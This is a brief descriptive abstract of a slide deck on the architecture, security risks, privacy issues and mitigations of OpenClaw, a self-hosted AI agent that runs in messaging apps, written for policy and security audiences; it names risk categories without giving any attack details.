OpenClaw AI:Security Risks, Architecture by Anupam Tiwari
1. As autonomous AI agents move from research labs into everyday messaging apps, the policy and security implications are no longer theoretical. OpenClaw AI originally released as Clawdbot in November 2025 and now viral globally under the nickname 'raising a lobster' represents a new class of personal AI: self-hosted, messaging-native, and capable of executing real-world tasks with minimal human oversight.
2. This 20-slide technical brief is prepared for think tanks, policy researchers, and academic audiences seeking a grounded, non-hype understanding of what OpenClaw is, how it works under the hood, and what risks it carries.
What this brief covers:
- Architecture: A layered breakdown of OpenClaw's five-tier design — from messaging bridge (Baileys, Telethon) through Agent Core, LLM inference routing, and tool execution — including a step-by-step data flow tracing a single user message through the full system.
- Security Risks: Ten documented risks rated by severity, likelihood, and exploitability — including prompt injection (Critical), session credential hijacking (Critical), skill script code execution (High), supply chain attacks, lateral movement via messaging, and local file system exposure. Each risk includes a realistic attack example.
- Privacy Analysis: LLM API data exposure, GDPR cross-border transfer implications, contact graph profiling, metadata accumulation, and the legal grey zone of running automated agents on platforms like WhatsApp and Telegram.
- Mitigations & Isolation Playbook: Actionable guidance including dedicated SIM/account isolation, Docker sandboxing, outbound firewall whitelisting, API key hygiene, and skill script review gates — all implementable today.
- Research Frontiers: Open academic questions across agentic AI safety, privacy-preserving LLM inference, human-agent interaction, and platform governance.
This is not a product review or a user guide. It is a structured technical and policy document for those who need to understand agentic AI at a systems level — before deployment decisions, regulatory responses, or research agendas are set.
Relevant audiences: AI policy analysts, cybersecurity researchers, academic institutions studying HCI and agentic systems, corporate risk and compliance teams, and journalists covering the AI governance space
https://orcid.org/0000-0002-9097-2246


.jpeg)
.jpeg)
.jpeg)

.jpeg)
.jpeg)
.jpeg)


